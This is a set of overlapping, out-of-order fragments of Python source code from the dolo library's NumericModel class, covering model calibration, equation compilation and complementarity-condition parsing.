depth=1)", "- \"expr<=a\" where a is a control - \"expr1<=a<=expr2\" ''' try: res =", "return self.get_calibration(pnames) group = [g for g in self.symbols.keys() if pname in self.symbols[g]]", "eqs] eqs = [str.strip(eq) for eq in eqs] target_spec = spec.get('target') n_output =", "== 'dtmscc': from dolo.algos.dtmscc.steady_state import residuals return residuals(self, calib) def eval_formula(self, expr, dataframe=None,", "= str.split(eq,'=') eq = '{} - ( {} )'.format(rhs, lhs) eq = str.strip(eq)", "in recipe['specs'].keys(): spec = recipe['specs'][funname] if funname not in self.symbolic.equations: if not spec.get('optional'):", "\"expr<=a\" where a is a control - \"expr1<=a<=expr2\" ''' try: res = regex.match(comp).groups()", "import OrderedDict from .codegen import to_source from .function_compiler_ast import timeshift, StandardizeDatesSimple from dolo.compiler.recipes", "import to_source from .function_compiler_ast import timeshift, StandardizeDatesSimple from dolo.compiler.recipes import recipes from numba", "condition '{}'\".format(comp)) res = [r.strip() for r in res] if res[1] != control:", "from dolo.misc.termcolor import colored s = u''' Model object: ------------ - name: \"{name}\"", "Exception(\"The model doesn't contain equations of type '{}'.\".format(funname)) else: continue if spec.get('target'): #", "'{}' incorrect. Expected {} instead of {}.\".format(comp, control, res[1]) raise Exception(msg) return [res[0],", "# eq = eq.replace('|', u\"\\u27C2\") ss += u\" {eqn:3} : {vals} : {eqs}\\n\".format(eqn=str(i+1),", "? if len(args)==2: pname, pvalue = args if isinstance(pname, str): self.set_calibration(**{pname:pvalue}) else: #", "if calib is None: calib = self.calibration return eval_formula(expr, dataframe=dataframe, context=calib) def __compile_functions__(self):", "lhs, rhs = eq.split('=') lhs = ast.parse( str.strip(lhs) ).body[0].value rhs = ast.parse( str.strip(rhs)", "symbols, arg_names, output_names=target_spec, funname=funname, definitions=ddefs, ) # print(\"So far so good !\")c n_output", "from dolo.compiler.function_compiler_ast import compile_function_ast from dolo.compiler.function_compiler import standard_function defs = self.symbolic.definitions # works", "try: group = group[0] except: raise Exception('Unknown symbol {}.'.format(pname)) i = self.symbols[group].index(pname) v", "isinstance(pname, list): return [ self.get_calibration(p) for p in pname ] elif isinstance(pname, tuple):", "for p in pname ] ) elif len(args)>0: pnames = (pname,) + args", "{}\\n\".format(eqgroup) for i, eq in enumerate(eqlist): val = res[eqgroup][i] if abs(val) < 1e-8:", "time in [-1,0,1]: dd = OrderedDict() for eq in auxeqs: lhs, rhs =", "else: return eq eqs = [filter_equal(eq) for eq in eqs] arg_names = recipe['specs'][funname]['eqs']", "keep only right-hand side # TODO: restore recursive definitions eqs = self.symbolic.equations[funname] eqs", "= [str.strip(eq) for eq in eqs] target_spec = spec.get('target') n_output = len(self.symbols[target_spec[0]]) #", "arg_names: if ag[0] == 'auxiliaries': t = ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) fun, gufun =", "compile_function_ast(comp_lhs, symbols, comp_args, funname=fb_names[0],definitions=defs) upper_bound, gu_upper_bound = compile_function_ast(comp_rhs, symbols, comp_args, funname=fb_names[1],definitions=defs) n_output =", "spec.get('target') n_output = len(self.symbols[target_spec[0]]) # target_short_name = spec.get('target')[2] if spec.get('recursive') is False: target_spec", "arg_names, output_names=target_spec, funname=funname, definitions=ddefs, ) # print(\"So far so good !\")c n_output =", "calib) def eval_formula(self, expr, dataframe=None, calib=None): from dolo.compiler.eval_formula import eval_formula if calib is", "if 'controls_ub' in self.functions: fun_lb = self.functions['controls_lb'] fun_ub = self.functions['controls_ub'] return [fun_lb, fun_ub]", "spec.get('complementarities'): # TODO: Rewrite and simplify comp_spec = spec.get('complementarities') comp_order = comp_spec['middle'] comp_args", "equations as rhs - lhs def filter_equal(eq): if '=' in eq: lhs, rhs", "def __compile_functions__(self): from dolo.compiler.function_compiler_ast import compile_function_ast from dolo.compiler.function_compiler import standard_function defs = self.symbolic.definitions", "comp_args, funname=fb_names[0],definitions=defs) upper_bound, gu_upper_bound = compile_function_ast(comp_rhs, symbols, comp_args, funname=fb_names[1],definitions=defs) n_output = len(comp_lhs) functions[fb_names[0]]", "def __repr__(self): return self.__str__() @property def x_bounds(self): if 'controls_ub' in self.functions: fun_lb =", "# s += pprint.pformat(compute_residuals(self),indent=2, depth=1) return s def __repr__(self): return self.__str__() @property def", "# TODO: Rewrite and simplify comp_spec = spec.get('complementarities') comp_order = comp_spec['middle'] comp_args =", "eq in eqs] target_spec = spec.get('target') n_output = len(self.symbols[target_spec[0]]) # target_short_name = spec.get('target')[2]", "+= u\" {eqn:3} : {vals} : {eqs}\\n\".format(eqn=str(i+1), vals=vals, eqs=eq) ss += \"\\n\" s", "in self.symbols[g]] try: group = group[0] except: raise Exception('Unknown symbol {}.'.format(pname)) i =", "= 0 vals = '{:.4f}'.format(val) if abs(val) > 1e-8: vals = colored(vals, 'red')", "if 'auxiliaries' not in self.symbols: model_type += '_' else: # prepare auxiliaries auxeqs", "markov_chain = None def __init__(self, symbolic_model, options=None, infos=None): self.symbolic = symbolic_model self.symbols =", "funname=fb_names[1],definitions=defs) n_output = len(comp_lhs) functions[fb_names[0]] = standard_function(gu_lower_bound, n_output ) functions[fb_names[1]] = standard_function(gu_upper_bound, n_output", "# prepare auxiliaries auxeqs = self.symbolic.equations['auxiliary'] auxdefs = {} for time in [-1,0,1]:", "comp_spec['left-right'] comps = [] eqs = [] for i,eq in enumerate(self.symbolic.equations[funname]): if '|'", "= evaluator.eval(self.symbolic.options) distribution = evaluator.eval(self.symbolic.distribution) discrete_transition = evaluator.eval(self.symbolic.discrete_transition) covariances = distribution if distribution", "spec = recipe['specs'][funname] if funname not in self.symbolic.equations: if not spec.get('optional'): raise Exception(\"The", "calibration = None calibration_dict = None covariances = None markov_chain = None def", "is None: self.markov_chain = None else: self.markov_chain = [numpy.atleast_2d(numpy.array(tab, dtype=float)) for tab in", "return tuple( [ self.get_calibration(p) for p in pname ] ) elif len(args)>0: pnames", "raise Exception('Unknown symbol {}.'.format(pname)) i = self.symbols[group].index(pname) v = self.calibration[group][i] return v def", "numpy.atleast_2d(numpy.array(covariances, dtype=float)) markov_chain = discrete_transition if markov_chain is None: self.markov_chain = None else:", "in pname ] elif isinstance(pname, tuple): return tuple( [ self.get_calibration(p) for p in", "depth=1) return s def __repr__(self): return self.__str__() @property def x_bounds(self): if 'controls_ub' in", "# TODO: restore recursive definitions eqs = self.symbolic.equations[funname] eqs = [eq.split('=')[1] for eq", "'controls_ub'.format(funname)] ddefs = OrderedDict() for ag in comp_args: if ag[0] == 'auxiliaries': t", "recursive definitions eqs = self.symbolic.equations[funname] eqs = [eq.split('=')[1] for eq in eqs] eqs", "= symbolic_model self.symbols = symbolic_model.symbols self.variables = sum( [tuple(e) for k,e in self.symbols.items()", "colored s = u''' Model object: ------------ - name: \"{name}\" - type: \"{type}\"", "v def set_calibration(self, *args, **kwargs): # raise exception if unknown symbol ? if", "self.get_calibration(p) for p in pname ] ) elif len(args)>0: pnames = (pname,) +", "tuple( [ self.get_calibration(p) for p in pname ] ) elif len(args)>0: pnames =", "only model_type = self.model_type if 'auxiliaries' not in self.symbols: model_type += '_' else:", "= self.symbolic.calibration_dict from dolo.compiler.triangular_solver import solve_triangular_system self.calibration_dict = solve_triangular_system( system ) from dolo.compiler.misc", "vals = colored(vals, 'red') # eq = eq.replace('|', u\"\\u27C2\") ss += u\" {eqn:3}", "model_type += '_' else: # prepare auxiliaries auxeqs = self.symbolic.equations['auxiliary'] auxdefs = {}", "= eq.split('=') lhs = ast.parse( str.strip(lhs) ).body[0].value rhs = ast.parse( str.strip(rhs) ).body[0].value tmp", "model_type = self.model_type if 'auxiliaries' not in self.symbols: model_type += '_' else: #", "eq = str.strip(eq) return eq else: return eq eqs = [filter_equal(eq) for eq", "a controls - \"expr<=a\" where a is a control - \"expr1<=a<=expr2\" ''' try:", "if distribution is None: self.covariances = None else: self.covariances = numpy.atleast_2d(numpy.array(covariances, dtype=float)) markov_chain", "= None else: self.markov_chain = [numpy.atleast_2d(numpy.array(tab, dtype=float)) for tab in markov_chain] def get_calibration(self,", "comps = [] functions = {} original_functions = {} original_gufunctions = {} for", "= [] eqs = [] for i,eq in enumerate(self.symbolic.equations[funname]): if '|' in eq:", "solve_triangular_system( system ) from dolo.compiler.misc import CalibrationDict, calibration_to_vector calib = calibration_to_vector(self.symbols, self.calibration_dict) self.calibration", "original_functions self.__original_gufunctions__ = original_gufunctions self.functions = functions import re regex = re.compile(\"(.*)<=(.*)<=(.*)\") def", "residuals(self, calib) def eval_formula(self, expr, dataframe=None, calib=None): from dolo.compiler.eval_formula import eval_formula if calib", "None else: self.covariances = numpy.atleast_2d(numpy.array(covariances, dtype=float)) markov_chain = discrete_transition if markov_chain is None:", "= group[0] except: raise Exception('Unknown symbol {}.'.format(pname)) i = self.symbols[group].index(pname) v = self.calibration[group][i]", "self.residuals() # for eqgroup, eqlist in self.symbolic.equations.items(): for eqgroup in res.keys(): eqlist =", "= spec.get('target')[2] if spec.get('recursive') is False: target_spec = None else: target_spec[2] = 'out'", "+= \"\\n\" s += ss # import pprint # s += '- residuals:\\n'", "'=' in eq: lhs, rhs = str.split(eq,'=') eq = '{} - ( {}", "eqs] arg_names = recipe['specs'][funname]['eqs'] ddefs = OrderedDict() for ag in arg_names: if ag[0]", "evaluator.eval(self.symbolic.discrete_transition) covariances = distribution if distribution is None: self.covariances = None else: self.covariances", "else ignore pname and pvalue calib = self.symbolic.calibration_dict calib.update(kwargs) self.__update_from_symbolic__() def __str__(self): from", "fun_ub] else: return None def residuals(self, calib=None): if self.model_type == 'dtcscc': from dolo.algos.dtcscc.steady_state", "self.calibration return eval_formula(expr, dataframe=dataframe, context=calib) def __compile_functions__(self): from dolo.compiler.function_compiler_ast import compile_function_ast from dolo.compiler.function_compiler", "models only model_type = self.model_type if 'auxiliaries' not in self.symbols: model_type += '_'", "s += ss # import pprint # s += '- residuals:\\n' # s", "auxeqs = self.symbolic.equations['auxiliary'] auxdefs = {} for time in [-1,0,1]: dd = OrderedDict()", "**kwargs): # raise exception if unknown symbol ? if len(args)==2: pname, pvalue =", "comp_order = comp_spec['middle'] comp_args = comp_spec['left-right'] comps = [] eqs = [] for", "= infos if infos is not None else {} self.infos['data_layout'] = 'columns' self.name", "fg models only model_type = self.model_type if 'auxiliaries' not in self.symbols: model_type +=", "eq: lhs, rhs = str.split(eq,'=') eq = '{} - ( {} )'.format(rhs, lhs)", "= spec.get('complementarities') comp_order = comp_spec['middle'] comp_args = comp_spec['left-right'] comps = [] eqs =", "eqs = self.symbolic.equations[funname] eqs = [eq.split('=')[1] for eq in eqs] eqs = [str.strip(eq)", "self.symbolic.definitions # works for fg models only model_type = self.model_type if 'auxiliaries' not", "gu_upper_bound # rewrite all equations as rhs - lhs def filter_equal(eq): if '='", "+= pprint.pformat(compute_residuals(self),indent=2, depth=1) return s def __repr__(self): return self.__str__() @property def x_bounds(self): if", "[] functions = {} original_functions = {} original_gufunctions = {} for funname in", "funname=funname, definitions=ddefs, ) # print(\"So far so good !\")c n_output = len(eqs) original_functions[funname]", "try: res = regex.match(comp).groups() except: raise Exception(\"Unable to parse complementarity condition '{}'\".format(comp)) res", "comp_args: if ag[0] == 'auxiliaries': t = ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) lower_bound, gu_lower_bound =", "len(comp_lhs) functions[fb_names[0]] = standard_function(gu_lower_bound, n_output ) functions[fb_names[1]] = standard_function(gu_upper_bound, n_output ) original_functions[fb_names[0]] =", "# fb_names = ['{}_lb'.format(funname), '{}_ub'.format(funname)] fb_names = ['controls_lb'.format(funname), 'controls_ub'.format(funname)] ddefs = OrderedDict() for", "in self.functions: fun_lb = self.functions['controls_lb'] fun_ub = self.functions['controls_ub'] return [fun_lb, fun_ub] else: return", "= ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) lower_bound, gu_lower_bound = compile_function_ast(comp_lhs, symbols, comp_args, funname=fb_names[0],definitions=defs) upper_bound, gu_upper_bound", "*args): if isinstance(pname, list): return [ self.get_calibration(p) for p in pname ] elif", "eq else: return eq eqs = [filter_equal(eq) for eq in eqs] arg_names =", "[-1,0,1]: dd = OrderedDict() for eq in auxeqs: lhs, rhs = eq.split('=') lhs", "ss = '\\n- residuals:\\n\\n' res = self.residuals() # for eqgroup, eqlist in self.symbolic.equations.items():", "self.symbols # should match self.symbols comps = [] functions = {} original_functions =", "get_calibration(self, pname, *args): if isinstance(pname, list): return [ self.get_calibration(p) for p in pname", "pvalue = args if isinstance(pname, str): self.set_calibration(**{pname:pvalue}) else: # else ignore pname and", "fb_names = ['controls_lb'.format(funname), 'controls_ub'.format(funname)] ddefs = OrderedDict() for ag in comp_args: if ag[0]", "{eqn:3} : {vals} : {eqs}\\n\".format(eqn=str(i+1), vals=vals, eqs=eq) ss += \"\\n\" s += ss", "str.strip(rhs) ).body[0].value tmp = timeshift(rhs, self.variables, time) k = timeshift(lhs, self.variables, time) k", "discrete_transition = evaluator.eval(self.symbolic.discrete_transition) covariances = distribution if distribution is None: self.covariances = None", "[] eqs = [] for i,eq in enumerate(self.symbolic.equations[funname]): if '|' in eq: control", "symbols, comp_args, funname=fb_names[1],definitions=defs) n_output = len(comp_lhs) functions[fb_names[0]] = standard_function(gu_lower_bound, n_output ) functions[fb_names[1]] =", "pprint.pformat(compute_residuals(self),indent=2, depth=1) return s def __repr__(self): return self.__str__() @property def x_bounds(self): if 'controls_ub'", "for fg models only model_type = self.model_type if 'auxiliaries' not in self.symbols: model_type", "= fun original_gufunctions[funname] = gufun self.__original_functions__ = original_functions self.__original_gufunctions__ = original_gufunctions self.functions =", "control - \"expr1<=a<=expr2\" ''' try: res = regex.match(comp).groups() except: raise Exception(\"Unable to parse", "comp_spec['middle'] comp_args = comp_spec['left-right'] comps = [] eqs = [] for i,eq in", "exception if unknown symbol ? if len(args)==2: pname, pvalue = args if isinstance(pname,", "return residuals(self, calib) def eval_formula(self, expr, dataframe=None, calib=None): from dolo.compiler.eval_formula import eval_formula if", "'out' else: target_spec = None if spec.get('complementarities'): # TODO: Rewrite and simplify comp_spec", "self.markov_chain = None else: self.markov_chain = [numpy.atleast_2d(numpy.array(tab, dtype=float)) for tab in markov_chain] def", "complementarity condition '{}'\".format(comp)) res = [r.strip() for r in res] if res[1] !=", "__str__(self): from dolo.misc.termcolor import colored s = u''' Model object: ------------ - name:", "StandardizeDatesSimple(self.variables).visit(tmp) dd[to_source(k)] = to_source(v) auxdefs[time] = dd recipe = recipes[model_type] symbols = self.symbols", "self.calibration[group][i] return v def set_calibration(self, *args, **kwargs): # raise exception if unknown symbol", "TODO: Rewrite and simplify comp_spec = spec.get('complementarities') comp_order = comp_spec['middle'] comp_args = comp_spec['left-right']", "[eq.split('=')[1] for eq in eqs] eqs = [str.strip(eq) for eq in eqs] target_spec", "options is not None else {} self.infos = infos if infos is not", "in [-1,0,1]: dd = OrderedDict() for eq in auxeqs: lhs, rhs = eq.split('=')", "= None else: self.covariances = numpy.atleast_2d(numpy.array(covariances, dtype=float)) markov_chain = discrete_transition if markov_chain is", "self.symbols.keys() if pname in self.symbols[g]] try: group = group[0] except: raise Exception('Unknown symbol", "+= u\" {}\\n\".format(eqgroup) for i, eq in enumerate(eqlist): val = res[eqgroup][i] if abs(val)", "None: self.markov_chain = None else: self.markov_chain = [numpy.atleast_2d(numpy.array(tab, dtype=float)) for tab in markov_chain]", "if isinstance(pname, str): self.set_calibration(**{pname:pvalue}) else: # else ignore pname and pvalue calib =", "isinstance(pname, str): self.set_calibration(**{pname:pvalue}) else: # else ignore pname and pvalue calib = self.symbolic.calibration_dict", "self.calibration = CalibrationDict(self.symbols, calib) from .symbolic_eval import NumericEval evaluator = NumericEval(self.calibration_dict) # read", "self.symbolic.calibration_dict calib.update(kwargs) self.__update_from_symbolic__() def __str__(self): from dolo.misc.termcolor import colored s = u''' Model", "None else {} self.infos = infos if infos is not None else {}", "== 'dtcscc': from dolo.algos.dtcscc.steady_state import residuals return residuals(self, calib) elif self.model_type == 'dtmscc':", "= self.symbolic.equations[funname] eqs = [eq.split('=')[1] for eq in eqs] eqs = [str.strip(eq) for", "self.__original_functions__ = original_functions self.__original_gufunctions__ = original_gufunctions self.functions = functions import re regex =", "recipes from numba import njit class NumericModel: calibration = None calibration_dict = None", "lower_bound original_functions[fb_names[1]] = upper_bound original_gufunctions[fb_names[0]] = gu_lower_bound original_gufunctions[fb_names[1]] = gu_upper_bound # rewrite all", "{} original_gufunctions = {} for funname in recipe['specs'].keys(): spec = recipe['specs'][funname] if funname", "is None: self.covariances = None else: self.covariances = numpy.atleast_2d(numpy.array(covariances, dtype=float)) markov_chain = discrete_transition", "original_functions[fb_names[1]] = upper_bound original_gufunctions[fb_names[0]] = gu_lower_bound original_gufunctions[fb_names[1]] = gu_upper_bound # rewrite all equations", "in markov_chain] def get_calibration(self, pname, *args): if isinstance(pname, list): return [ self.get_calibration(p) for", "# comp can be either: - None - \"a<=expr\" where a is a", "target_spec[2] = 'out' else: target_spec = None if spec.get('complementarities'): # TODO: Rewrite and", "= self.symbolic.calibration_dict calib.update(kwargs) self.__update_from_symbolic__() def __str__(self): from dolo.misc.termcolor import colored s = u'''", "incorrect. Expected {} instead of {}.\".format(comp, control, res[1]) raise Exception(msg) return [res[0], res[2]]", "= recipes[model_type] symbols = self.symbols # should match self.symbols comps = [] functions", "def __str__(self): from dolo.misc.termcolor import colored s = u''' Model object: ------------ -", "functions import re regex = re.compile(\"(.*)<=(.*)<=(.*)\") def decode_complementarity(comp, control): ''' # comp can", "original_gufunctions[fb_names[0]] = gu_lower_bound original_gufunctions[fb_names[1]] = gu_upper_bound # rewrite all equations as rhs -", "in enumerate(self.symbolic.equations[funname]): if '|' in eq: control = self.symbols[comp_order[0]][i] eq, comp = str.split(eq,'|')", "None calibration_dict = None covariances = None markov_chain = None def __init__(self, symbolic_model,", "symbol ? if len(args)==2: pname, pvalue = args if isinstance(pname, str): self.set_calibration(**{pname:pvalue}) else:", "functions[funname] = standard_function(gufun, n_output ) original_functions[funname] = fun original_gufunctions[funname] = gufun self.__original_functions__ =", "args return self.get_calibration(pnames) group = [g for g in self.symbols.keys() if pname in", "residuals:\\n\\n' res = self.residuals() # for eqgroup, eqlist in self.symbolic.equations.items(): for eqgroup in", "residuals(self, calib) elif self.model_type == 'dtmscc': from dolo.algos.dtmscc.steady_state import residuals return residuals(self, calib)", "for funname in recipe['specs'].keys(): spec = recipe['specs'][funname] if funname not in self.symbolic.equations: if", "= str.split(eq,'|') lhs, rhs = decode_complementarity(comp, control) comps.append([lhs, rhs]) else: comps.append(['-inf', 'inf']) eqs.append(eq)", "import eval_formula if calib is None: calib = self.calibration return eval_formula(expr, dataframe=dataframe, context=calib)", "compile_function_ast(eqs, symbols, arg_names, output_names=target_spec, funname=funname, definitions=ddefs, ) # print(\"So far so good !\")c", "print(\"So far so good !\")c n_output = len(eqs) original_functions[funname] = fun functions[funname] =", "infos=None): self.symbolic = symbolic_model self.symbols = symbolic_model.symbols self.variables = sum( [tuple(e) for k,e", "dolo.misc.termcolor import colored s = u''' Model object: ------------ - name: \"{name}\" -", "self.symbols[comp_order[0]][i] eq, comp = str.split(eq,'|') lhs, rhs = decode_complementarity(comp, control) comps.append([lhs, rhs]) else:", "self.variables = sum( [tuple(e) for k,e in self.symbols.items() if k not in ('parameters','shocks','values')],", "if res[1] != control: msg = \"Complementarity condition '{}' incorrect. Expected {} instead", "n_output ) original_functions[fb_names[0]] = lower_bound original_functions[fb_names[1]] = upper_bound original_gufunctions[fb_names[0]] = gu_lower_bound original_gufunctions[fb_names[1]] =", "= self.model_type if 'auxiliaries' not in self.symbols: model_type += '_' else: # prepare", "('parameters','shocks','values')], ()) self.options = options if options is not None else {} self.infos", "= 'columns' self.name = self.infos['name'] self.model_type = self.infos['type'] # self.model_spec self.__update_from_symbolic__() self.__compile_functions__() def", "str.split(eq,'|') lhs, rhs = decode_complementarity(comp, control) comps.append([lhs, rhs]) else: comps.append(['-inf', 'inf']) eqs.append(eq) comp_lhs,", "good !\")c n_output = len(eqs) original_functions[funname] = fun functions[funname] = standard_function(gufun, n_output )", "collections import OrderedDict from .codegen import to_source from .function_compiler_ast import timeshift, StandardizeDatesSimple from", "= len(eqs) original_functions[funname] = fun functions[funname] = standard_function(gufun, n_output ) original_functions[funname] = fun", "s += pprint.pformat(compute_residuals(self),indent=2, depth=1) return s def __repr__(self): return self.__str__() @property def x_bounds(self):", "= NumericEval(self.calibration_dict) # read symbolic structure self.options = evaluator.eval(self.symbolic.options) distribution = evaluator.eval(self.symbolic.distribution) discrete_transition", "symbolic structure self.options = evaluator.eval(self.symbolic.options) distribution = evaluator.eval(self.symbolic.distribution) discrete_transition = evaluator.eval(self.symbolic.discrete_transition) covariances =", "lhs def filter_equal(eq): if '=' in eq: lhs, rhs = str.split(eq,'=') eq =", "auxdefs[time] = dd recipe = recipes[model_type] symbols = self.symbols # should match self.symbols", "\"\\n\" s += ss # import pprint # s += '- residuals:\\n' #", "fun_ub = self.functions['controls_ub'] return [fun_lb, fun_ub] else: return None def residuals(self, calib=None): if", "dolo.algos.dtcscc.steady_state import residuals return residuals(self, calib) elif self.model_type == 'dtmscc': from dolo.algos.dtmscc.steady_state import", "= self.infos['type'] # self.model_spec self.__update_from_symbolic__() self.__compile_functions__() def __update_from_symbolic__(self): import numpy # updates calibration", "self.symbolic.equations['auxiliary'] auxdefs = {} for time in [-1,0,1]: dd = OrderedDict() for eq", "= None def __init__(self, symbolic_model, options=None, infos=None): self.symbolic = symbolic_model self.symbols = symbolic_model.symbols", "should match self.symbols comps = [] functions = {} original_functions = {} original_gufunctions", "in comp_args: if ag[0] == 'auxiliaries': t = ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) lower_bound, gu_lower_bound", "{} for time in [-1,0,1]: dd = OrderedDict() for eq in auxeqs: lhs,", "ast from collections import OrderedDict from .codegen import to_source from .function_compiler_ast import timeshift,", "= {} for time in [-1,0,1]: dd = OrderedDict() for eq in auxeqs:", "] elif isinstance(pname, tuple): return tuple( [ self.get_calibration(p) for p in pname ]", "self.symbols[g]] try: group = group[0] except: raise Exception('Unknown symbol {}.'.format(pname)) i = self.symbols[group].index(pname)", "= zip(*comps) # fb_names = ['{}_lb'.format(funname), '{}_ub'.format(funname)] fb_names = ['controls_lb'.format(funname), 'controls_ub'.format(funname)] ddefs =", "self.symbols[group].index(pname) v = self.calibration[group][i] return v def set_calibration(self, *args, **kwargs): # raise exception", "= eq.replace('|', u\"\\u27C2\") ss += u\" {eqn:3} : {vals} : {eqs}\\n\".format(eqn=str(i+1), vals=vals, eqs=eq)", "= fun functions[funname] = standard_function(gufun, n_output ) original_functions[funname] = fun original_gufunctions[funname] = gufun", "far so good !\")c n_output = len(eqs) original_functions[funname] = fun functions[funname] = standard_function(gufun,", "== 'auxiliaries': t = ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) fun, gufun = compile_function_ast(eqs, symbols, arg_names,", "markov_chain is None: self.markov_chain = None else: self.markov_chain = [numpy.atleast_2d(numpy.array(tab, dtype=float)) for tab", "self.functions['controls_ub'] return [fun_lb, fun_ub] else: return None def residuals(self, calib=None): if self.model_type ==", "self.model_type if 'auxiliaries' not in self.symbols: model_type += '_' else: # prepare auxiliaries", "self.name = self.infos['name'] self.model_type = self.infos['type'] # self.model_spec self.__update_from_symbolic__() self.__compile_functions__() def __update_from_symbolic__(self): import", "!= control: msg = \"Complementarity condition '{}' incorrect. Expected {} instead of {}.\".format(comp,", "= sum( [tuple(e) for k,e in self.symbols.items() if k not in ('parameters','shocks','values')], ())", "import residuals return residuals(self, calib) def eval_formula(self, expr, dataframe=None, calib=None): from dolo.compiler.eval_formula import", "enumerate(eqlist): val = res[eqgroup][i] if abs(val) < 1e-8: val = 0 vals =", "time) k = StandardizeDatesSimple(self.variables).visit(k) v = StandardizeDatesSimple(self.variables).visit(tmp) dd[to_source(k)] = to_source(v) auxdefs[time] = dd", "control = self.symbols[comp_order[0]][i] eq, comp = str.split(eq,'|') lhs, rhs = decode_complementarity(comp, control) comps.append([lhs,", "= {} original_functions = {} original_gufunctions = {} for funname in recipe['specs'].keys(): spec", "def set_calibration(self, *args, **kwargs): # raise exception if unknown symbol ? if len(args)==2:", "pname ] elif isinstance(pname, tuple): return tuple( [ self.get_calibration(p) for p in pname", "a control - \"expr1<=a<=expr2\" ''' try: res = regex.match(comp).groups() except: raise Exception(\"Unable to", "from dolo.compiler.recipes import recipes from numba import njit class NumericModel: calibration = None", "self.symbolic.equations: if not spec.get('optional'): raise Exception(\"The model doesn't contain equations of type '{}'.\".format(funname))", "else: comps.append(['-inf', 'inf']) eqs.append(eq) comp_lhs, comp_rhs = zip(*comps) # fb_names = ['{}_lb'.format(funname), '{}_ub'.format(funname)]", ".codegen import to_source from .function_compiler_ast import timeshift, StandardizeDatesSimple from dolo.compiler.recipes import recipes from", "\"Complementarity condition '{}' incorrect. Expected {} instead of {}.\".format(comp, control, res[1]) raise Exception(msg)", "= timeshift(lhs, self.variables, time) k = StandardizeDatesSimple(self.variables).visit(k) v = StandardizeDatesSimple(self.variables).visit(tmp) dd[to_source(k)] = to_source(v)", "pnames = (pname,) + args return self.get_calibration(pnames) group = [g for g in", "eqs = [] for i,eq in enumerate(self.symbolic.equations[funname]): if '|' in eq: control =", "Rewrite and simplify comp_spec = spec.get('complementarities') comp_order = comp_spec['middle'] comp_args = comp_spec['left-right'] comps", "else: # prepare auxiliaries auxeqs = self.symbolic.equations['auxiliary'] auxdefs = {} for time in", "__update_from_symbolic__(self): import numpy # updates calibration according to the symbolic definitions system =", "res.keys(): eqlist = self.symbolic.equations[eqgroup] ss += u\" {}\\n\".format(eqgroup) for i, eq in enumerate(eqlist):", "None: calib = self.calibration return eval_formula(expr, dataframe=dataframe, context=calib) def __compile_functions__(self): from dolo.compiler.function_compiler_ast import", "res = regex.match(comp).groups() except: raise Exception(\"Unable to parse complementarity condition '{}'\".format(comp)) res =", "str.strip(lhs) ).body[0].value rhs = ast.parse( str.strip(rhs) ).body[0].value tmp = timeshift(rhs, self.variables, time) k", "funname=fb_names[0],definitions=defs) upper_bound, gu_upper_bound = compile_function_ast(comp_rhs, symbols, comp_args, funname=fb_names[1],definitions=defs) n_output = len(comp_lhs) functions[fb_names[0]] =", "eqgroup, eqlist in self.symbolic.equations.items(): for eqgroup in res.keys(): eqlist = self.symbolic.equations[eqgroup] ss +=", "ddefs.update(defs) fun, gufun = compile_function_ast(eqs, symbols, arg_names, output_names=target_spec, funname=funname, definitions=ddefs, ) # print(\"So", "# should match self.symbols comps = [] functions = {} original_functions = {}", "eqs = [str.strip(eq) for eq in eqs] target_spec = spec.get('target') n_output = len(self.symbols[target_spec[0]])", "val = res[eqgroup][i] if abs(val) < 1e-8: val = 0 vals = '{:.4f}'.format(val)", "return eq eqs = [filter_equal(eq) for eq in eqs] arg_names = recipe['specs'][funname]['eqs'] ddefs", "definitions=ddefs, ) # print(\"So far so good !\")c n_output = len(eqs) original_functions[funname] =", "comp = str.split(eq,'|') lhs, rhs = decode_complementarity(comp, control) comps.append([lhs, rhs]) else: comps.append(['-inf', 'inf'])", "= \"Complementarity condition '{}' incorrect. Expected {} instead of {}.\".format(comp, control, res[1]) raise", "- \"expr1<=a<=expr2\" ''' try: res = regex.match(comp).groups() except: raise Exception(\"Unable to parse complementarity", "= None covariances = None markov_chain = None def __init__(self, symbolic_model, options=None, infos=None):", "fun, gufun = compile_function_ast(eqs, symbols, arg_names, output_names=target_spec, funname=funname, definitions=ddefs, ) # print(\"So far", "evaluator.eval(self.symbolic.options) distribution = evaluator.eval(self.symbolic.distribution) discrete_transition = evaluator.eval(self.symbolic.discrete_transition) covariances = distribution if distribution is", "tab in markov_chain] def get_calibration(self, pname, *args): if isinstance(pname, list): return [ self.get_calibration(p)", "not None else {} self.infos['data_layout'] = 'columns' self.name = self.infos['name'] self.model_type = self.infos['type']", "None else: self.markov_chain = [numpy.atleast_2d(numpy.array(tab, dtype=float)) for tab in markov_chain] def get_calibration(self, pname,", "= upper_bound original_gufunctions[fb_names[0]] = gu_lower_bound original_gufunctions[fb_names[1]] = gu_upper_bound # rewrite all equations as", "recipe['specs'].keys(): spec = recipe['specs'][funname] if funname not in self.symbolic.equations: if not spec.get('optional'): raise", "a is a controls - \"expr<=a\" where a is a control - \"expr1<=a<=expr2\"", "[str.strip(eq) for eq in eqs] target_spec = spec.get('target') n_output = len(self.symbols[target_spec[0]]) # target_short_name", "v = self.calibration[group][i] return v def set_calibration(self, *args, **kwargs): # raise exception if", "calib = calibration_to_vector(self.symbols, self.calibration_dict) self.calibration = CalibrationDict(self.symbols, calib) from .symbolic_eval import NumericEval evaluator", "ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) lower_bound, gu_lower_bound = compile_function_ast(comp_lhs, symbols, comp_args, funname=fb_names[0],definitions=defs) upper_bound, gu_upper_bound =", "unknown symbol ? if len(args)==2: pname, pvalue = args if isinstance(pname, str): self.set_calibration(**{pname:pvalue})", "in eq: lhs, rhs = str.split(eq,'=') eq = '{} - ( {} )'.format(rhs,", "# else ignore pname and pvalue calib = self.symbolic.calibration_dict calib.update(kwargs) self.__update_from_symbolic__() def __str__(self):", "comp_args = comp_spec['left-right'] comps = [] eqs = [] for i,eq in enumerate(self.symbolic.equations[funname]):", "'dtmscc': from dolo.algos.dtmscc.steady_state import residuals return residuals(self, calib) def eval_formula(self, expr, dataframe=None, calib=None):", "parse complementarity condition '{}'\".format(comp)) res = [r.strip() for r in res] if res[1]", "ddefs.update(defs) lower_bound, gu_lower_bound = compile_function_ast(comp_lhs, symbols, comp_args, funname=fb_names[0],definitions=defs) upper_bound, gu_upper_bound = compile_function_ast(comp_rhs, symbols,", "{} self.infos = infos if infos is not None else {} 